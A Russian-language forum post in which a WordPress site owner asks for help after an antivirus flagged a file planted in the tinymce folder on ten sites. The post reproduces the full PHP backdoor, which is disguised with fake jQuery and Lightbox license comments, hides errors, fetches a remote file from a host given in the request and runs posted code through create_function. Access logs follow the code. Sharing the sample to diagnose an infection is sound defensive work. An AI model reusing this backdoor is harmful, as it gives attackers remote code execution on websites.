Вирус (\wp-includes\js\tinymce)
-
Всем привет. Сегодня утром на хостинге антивирус ругался на файл в папке tinymce (\wp-includes\js\tinymce) именно создавался файл \wp-includes\js\tinymce\langs\80504209.phtxm + avatar.png + .htaccess и вопросы был в файле 80504209.phtxm и в строке $sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
В один момент произошло на 10 сайтах и 6 поддоменах. Кто то сталкивался с таким ?. Я снёс всю папку tinymce.
Вирусов на компе нету, фтп доступы все свежые и они только у меня, больше не укого нету. То есть может через какой-то плагин залетел или что ещё.* jQuery Image Library v1.6.3
* http://jquery.com/
*
* Copyright 2011, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2011, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Thu May 12 15:04:36 2011 -0400
* * * * * * * * * * * * * * * * * * * * Don't delete this file * * * * * * * * * * * * * * * *
*/
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('display_errors', 0);
@ini_set('allow_url_fopen', 1);
@error_reporting(0);
/*
Lightbox v2.51
by Lokesh Dhakar - http://www.lokeshdhakar.com
For more information, visit:
http://lokeshdhakar.com/projects/lightbox2/
Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/
- free for use in both personal and commercial projects
- attribution requires leaving author name, author link, and the license info intact
Thanks
- Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.com), and Thomas Fuchs(mir.aculo.us) for ideas, libs, and snippets.
- Artemy Tregubenko (arty.name) for cleanup and help in updating to latest proto-aculous in v2.05.
*/
echo "<!-- "."tes"."ts -->";
$cmat='unct' .'ion';$cmat= 'cre' . 'ate' .'_f' .$cmat;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );if((isset(${$sizz }[ 'j01bt5ri3p']))&(isset(${$sizz}['fail']))){
if(isset(${$sizz}[ 'pathik'])){$pathik=$_SERVER['DOCUMENT_ROOT'].${$sizz}['pathik'];}else{$pathik=$_SERVER['DOCUMENT_ROOT'].'/license.php';}
if(isset(${$sizz}[ 'unl'])){@unlink($pathik);exit();}
/*! jQuery v@1.8.0 jquery.com | jquery.org/license */
if(@ini_get('allow_url_fopen')){@copy('http://'.${$sizz}['fail'].'/test.txt', $pathik);}
if((@function_exists('curl_init'))and ((!file_exists($pathik)) or (@filesize($pathik)<'1'))) {
$ch = @curl_init();curl_setopt( $ch, CURLOPT_URL, 'http://'.${$sizz}['fail'].'/test.txt' );
curl_setopt( $ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT'] );curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$fp = @fopen($pathik, 'w');curl_setopt($ch, CURLOPT_FILE, $fp);@curl_exec( $ch );curl_close( $ch );fclose($fp);}}
if (@function_exists($cmat)){if(isset( ${$sizz }[ 'j01bt5ri3p'] ) ) {$cmat('', '};'.${$sizz }['j01bt5ri3p'].'{');}}
?>
-
Смотрю Логи доступа сайта
если брать каждый сайт то все одно и тоже тольки ИП страны меняется
GET /uploaded_script.php
Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36
www.google.comGET /
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/botGET /robots.txt
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Viewer/99.9.8853.8GET /
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Viewer/99.9.8853.8GET /
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36GET /
Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0GET /robots.txt
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbotИ вот логи в реальном времени по всем сайтам
01:239:391:cb00::1 - - [19/Mar/2025:08:17:01 +0200] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
2a01:239:391:cb00::1 - - [19/Mar/2025:08:17:04 +0200] "GET / HTTP/1.0" 200 48862 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
178.128.104.119 - - [19/Mar/2025:09:13:20 +0200] "GET /uploaded_script.php HTTP/1.0" 301 162 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
178.128.104.119 - - [19/Mar/2025:09:13:21 +0200] "GET /uploaded_script.php HTTP/1.0" 429 4349 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36"
35.89.157.218 - - [19/Mar/2025:14:31:34 +0200] "GET / HTTP/1.0" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
2001:67c:2070:c927::1 - - [19/Mar/2025:14:31:36 +0200] "POST /wp-cron.php?
35.89.157.218 - - [19/Mar/2025:14:31:37 +0200] "GET / HTTP/1.0" 200 50300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
35.89.157.218 - - [19/Mar/2025:14:31:39 +0200] "GET / HTTP/1.0" 200 50300 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
2001:67c:2070:c927::1 - - [19/Mar/2025:16:09:35 +0200] "POST /wp-cron.php?doing_wp_cron=1742393375.8317399024963378906250 HTTP/1.0" 200 0 "-" "WordPress/6.7.2;
51.8.102.16 - - [19/Mar/2025:16:09:35 +0200] "GET /robots.txt HTTP/1.0" 200 96 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
- Для ответа на тему необходимо авторизоваться.